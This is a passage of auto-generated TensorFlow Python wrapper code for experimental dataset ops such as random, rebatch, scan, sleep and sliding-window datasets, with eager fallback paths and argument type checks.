sparse_types=sparse_types,
dense_shapes=dense_shapes,
output_types=output_types,
output_shapes=output_shapes,
sloppy=sloppy, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("sparse_keys", _op.get_attr("sparse_keys"), "dense_keys",
_op.get_attr("dense_keys"), "sparse_types",
_op.get_attr("sparse_types"), "Tdense", _op.get_attr("Tdense"),
"dense_shapes", _op.get_attr("dense_shapes"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "sloppy", _op.get_attr("sloppy"))
_execute.record_gradient(
"ExperimentalParseExampleDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalParseExampleDataset(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None):
return experimental_parse_example_dataset(input_dataset=input_dataset, num_parallel_calls=num_parallel_calls, dense_defaults=dense_defaults, sparse_keys=sparse_keys, dense_keys=dense_keys, sparse_types=sparse_types, dense_shapes=dense_shapes, output_types=output_types, output_shapes=output_shapes, sloppy=sloppy, name=name)
ExperimentalParseExampleDataset.__doc__ = experimental_parse_example_dataset.__doc__
ExperimentalParseExampleDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalParseExampleDataset))
tf_export("raw_ops.ExperimentalParseExampleDataset")(ExperimentalParseExampleDataset)
def experimental_parse_example_dataset_eager_fallback(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_parse_example_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(sparse_keys, (list, tuple)):
raise TypeError(
"Expected list for 'sparse_keys' argument to "
"'experimental_parse_example_dataset' Op, not %r." % sparse_keys)
sparse_keys = [_execute.make_str(_s, "sparse_keys") for _s in sparse_keys]
if not isinstance(dense_keys, (list, tuple)):
raise TypeError(
"Expected list for 'dense_keys' argument to "
"'experimental_parse_example_dataset' Op, not %r." % dense_keys)
dense_keys = [_execute.make_str(_s, "dense_keys") for _s in dense_keys]
if not isinstance(sparse_types, (list, tuple)):
raise TypeError(
"Expected list for 'sparse_types' argument to "
"'experimental_parse_example_dataset' Op, not %r." % sparse_types)
sparse_types = [_execute.make_type(_t, "sparse_types") for _t in sparse_types]
if not isinstance(dense_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'dense_shapes' argument to "
"'experimental_parse_example_dataset' Op, not %r." % dense_shapes)
dense_shapes = [_execute.make_shape(_s, "dense_shapes") for _s in dense_shapes]
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_parse_example_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_parse_example_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if sloppy is None:
sloppy = False
sloppy = _execute.make_bool(sloppy, "sloppy")
_attr_Tdense, dense_defaults = _execute.convert_to_mixed_eager_tensors(dense_defaults, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
_inputs_flat = [input_dataset, num_parallel_calls] + list(dense_defaults)
_attrs = ("sparse_keys", sparse_keys, "dense_keys", dense_keys,
"sparse_types", sparse_types, "Tdense", _attr_Tdense, "dense_shapes",
dense_shapes, "output_types", output_types, "output_shapes", output_shapes,
"sloppy", sloppy)
_result = _execute.execute(b"ExperimentalParseExampleDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalParseExampleDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_private_thread_pool_dataset(input_dataset, num_threads, output_types, output_shapes, name=None):
r"""Creates a dataset that uses a custom thread pool to compute `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
num_threads: A `Tensor` of type `int64`.
Identifies the number of threads to use for the private threadpool.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalPrivateThreadPoolDataset", name,
_ctx._post_execution_callbacks, input_dataset, num_threads,
"output_types", output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_private_thread_pool_dataset_eager_fallback(
input_dataset, num_threads, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_private_thread_pool_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_private_thread_pool_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalPrivateThreadPoolDataset", input_dataset=input_dataset,
num_threads=num_threads,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalPrivateThreadPoolDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalPrivateThreadPoolDataset(input_dataset, num_threads, output_types, output_shapes, name=None):
return experimental_private_thread_pool_dataset(input_dataset=input_dataset, num_threads=num_threads, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalPrivateThreadPoolDataset.__doc__ = experimental_private_thread_pool_dataset.__doc__
ExperimentalPrivateThreadPoolDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalPrivateThreadPoolDataset))
tf_export("raw_ops.ExperimentalPrivateThreadPoolDataset")(ExperimentalPrivateThreadPoolDataset)
def experimental_private_thread_pool_dataset_eager_fallback(input_dataset, num_threads, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_private_thread_pool_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_private_thread_pool_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_private_thread_pool_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
num_threads = _ops.convert_to_tensor(num_threads, _dtypes.int64)
_inputs_flat = [input_dataset, num_threads]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalPrivateThreadPoolDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalPrivateThreadPoolDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_random_dataset(seed, seed2, output_types, output_shapes, name=None):
r"""Creates a Dataset that returns pseudorandom numbers.
Args:
seed: A `Tensor` of type `int64`.
A scalar seed for the random number generator. If either seed or
seed2 is set to be non-zero, the random number generator is seeded
by the given seed. Otherwise, a random seed is used.
seed2: A `Tensor` of type `int64`.
A second scalar seed to avoid seed collision.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalRandomDataset", name, _ctx._post_execution_callbacks,
seed, seed2, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_random_dataset_eager_fallback(
seed, seed2, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_random_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_random_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalRandomDataset", seed=seed, seed2=seed2,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalRandomDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalRandomDataset(seed, seed2, output_types, output_shapes, name=None):
return experimental_random_dataset(seed=seed, seed2=seed2, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalRandomDataset.__doc__ = experimental_random_dataset.__doc__
ExperimentalRandomDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalRandomDataset))
tf_export("raw_ops.ExperimentalRandomDataset")(ExperimentalRandomDataset)
def experimental_random_dataset_eager_fallback(seed, seed2, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_random_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_random_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_random_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
seed2 = _ops.convert_to_tensor(seed2, _dtypes.int64)
_inputs_flat = [seed, seed2]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalRandomDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalRandomDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_rebatch_dataset(input_dataset, num_workers, output_types, output_shapes, name=None):
r"""Creates a dataset that changes the batch size.
Creates a dataset that changes the batch size of the dataset to current batch
size // num_workers.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
num_workers: A `Tensor` of type `int64`.
A scalar representing the number of workers to distribute this batch across. As
a result of this transformation the current batch size would end up being
divided by this parameter.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalRebatchDataset", name, _ctx._post_execution_callbacks,
input_dataset, num_workers, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_rebatch_dataset_eager_fallback(
input_dataset, num_workers, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_rebatch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_rebatch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalRebatchDataset", input_dataset=input_dataset,
num_workers=num_workers,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalRebatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalRebatchDataset(input_dataset, num_workers, output_types, output_shapes, name=None):
return experimental_rebatch_dataset(input_dataset=input_dataset, num_workers=num_workers, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalRebatchDataset.__doc__ = experimental_rebatch_dataset.__doc__
ExperimentalRebatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalRebatchDataset))
tf_export("raw_ops.ExperimentalRebatchDataset")(ExperimentalRebatchDataset)
def experimental_rebatch_dataset_eager_fallback(input_dataset, num_workers, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_rebatch_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_rebatch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_rebatch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
num_workers = _ops.convert_to_tensor(num_workers, _dtypes.int64)
_inputs_flat = [input_dataset, num_workers]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalRebatchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalRebatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_scan_dataset(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None):
r"""Creates a dataset successively reduces `f` over the elements of `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
initial_state: A list of `Tensor` objects.
other_arguments: A list of `Tensor` objects.
f: A function decorated with @Defun.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
preserve_cardinality: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalScanDataset", name, _ctx._post_execution_callbacks,
input_dataset, initial_state, other_arguments, "f", f, "output_types",
output_types, "output_shapes", output_shapes, "preserve_cardinality",
preserve_cardinality)
return _result
except _core._FallbackException:
try:
return experimental_scan_dataset_eager_fallback(
input_dataset, initial_state, other_arguments, f=f,
output_types=output_types, output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_scan_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_scan_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalScanDataset", input_dataset=input_dataset,
initial_state=initial_state,
other_arguments=other_arguments, f=f,
output_types=output_types,
output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("f", _op.get_attr("f"), "Tstate", _op.get_attr("Tstate"),
"Targuments", _op.get_attr("Targuments"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "preserve_cardinality",
_op.get_attr("preserve_cardinality"))
_execute.record_gradient(
"ExperimentalScanDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalScanDataset(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None):
return experimental_scan_dataset(input_dataset=input_dataset, initial_state=initial_state, other_arguments=other_arguments, f=f, output_types=output_types, output_shapes=output_shapes, preserve_cardinality=preserve_cardinality, name=name)
ExperimentalScanDataset.__doc__ = experimental_scan_dataset.__doc__
ExperimentalScanDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalScanDataset))
tf_export("raw_ops.ExperimentalScanDataset")(ExperimentalScanDataset)
def experimental_scan_dataset_eager_fallback(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_scan_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_scan_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_scan_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_attr_Tstate, initial_state = _execute.convert_to_mixed_eager_tensors(initial_state, _ctx)
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset] + list(initial_state) + list(other_arguments)
_attrs = ("f", f, "Tstate", _attr_Tstate, "Targuments", _attr_Targuments,
"output_types", output_types, "output_shapes", output_shapes,
"preserve_cardinality", preserve_cardinality)
_result = _execute.execute(b"ExperimentalScanDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalScanDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_set_stats_aggregator_dataset(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_dataset: A `Tensor` of type `variant`.
stats_aggregator: A `Tensor` of type `resource`.
tag: A `Tensor` of type `string`.
counter_prefix: A `Tensor` of type `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalSetStatsAggregatorDataset", name,
_ctx._post_execution_callbacks, input_dataset, stats_aggregator, tag,
counter_prefix, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_set_stats_aggregator_dataset_eager_fallback(
input_dataset, stats_aggregator, tag, counter_prefix,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_set_stats_aggregator_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_set_stats_aggregator_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalSetStatsAggregatorDataset", input_dataset=input_dataset,
stats_aggregator=stats_aggregator,
tag=tag,
counter_prefix=counter_prefix,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalSetStatsAggregatorDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalSetStatsAggregatorDataset(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None):
return experimental_set_stats_aggregator_dataset(input_dataset=input_dataset, stats_aggregator=stats_aggregator, tag=tag, counter_prefix=counter_prefix, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalSetStatsAggregatorDataset.__doc__ = experimental_set_stats_aggregator_dataset.__doc__
ExperimentalSetStatsAggregatorDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSetStatsAggregatorDataset))
tf_export("raw_ops.ExperimentalSetStatsAggregatorDataset")(ExperimentalSetStatsAggregatorDataset)
def experimental_set_stats_aggregator_dataset_eager_fallback(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_set_stats_aggregator_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_set_stats_aggregator_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_set_stats_aggregator_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
stats_aggregator = _ops.convert_to_tensor(stats_aggregator, _dtypes.resource)
tag = _ops.convert_to_tensor(tag, _dtypes.string)
counter_prefix = _ops.convert_to_tensor(counter_prefix, _dtypes.string)
_inputs_flat = [input_dataset, stats_aggregator, tag, counter_prefix]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalSetStatsAggregatorDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalSetStatsAggregatorDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_sleep_dataset(input_dataset, sleep_microseconds, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_dataset: A `Tensor` of type `variant`.
sleep_microseconds: A `Tensor` of type `int64`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalSleepDataset", name, _ctx._post_execution_callbacks,
input_dataset, sleep_microseconds, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_sleep_dataset_eager_fallback(
input_dataset, sleep_microseconds, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sleep_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sleep_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalSleepDataset", input_dataset=input_dataset,
sleep_microseconds=sleep_microseconds,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalSleepDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalSleepDataset(input_dataset, sleep_microseconds, output_types, output_shapes, name=None):
return experimental_sleep_dataset(input_dataset=input_dataset, sleep_microseconds=sleep_microseconds, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalSleepDataset.__doc__ = experimental_sleep_dataset.__doc__
ExperimentalSleepDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSleepDataset))
tf_export("raw_ops.ExperimentalSleepDataset")(ExperimentalSleepDataset)
def experimental_sleep_dataset_eager_fallback(input_dataset, sleep_microseconds, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_sleep_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sleep_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sleep_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
sleep_microseconds = _ops.convert_to_tensor(sleep_microseconds, _dtypes.int64)
_inputs_flat = [input_dataset, sleep_microseconds]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalSleepDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalSleepDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_sliding_window_dataset(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None):
r"""Creates a dataset that passes a sliding window over `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
window_size: A `Tensor` of type `int64`.
A scalar representing the number of elements in the
sliding window.
window_shift: A `Tensor` of type `int64`.
A scalar representing the steps moving the sliding window
forward in one iteration. It must be positive.
window_stride: A `Tensor` of type `int64`.
A scalar representing the stride of the input elements of the sliding window.
It must be positive.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalSlidingWindowDataset", name,
_ctx._post_execution_callbacks, input_dataset, window_size,
window_shift, window_stride, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_sliding_window_dataset_eager_fallback(
input_dataset, window_size, window_shift, window_stride,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sliding_window_dataset' Op, not %r." % output_types)
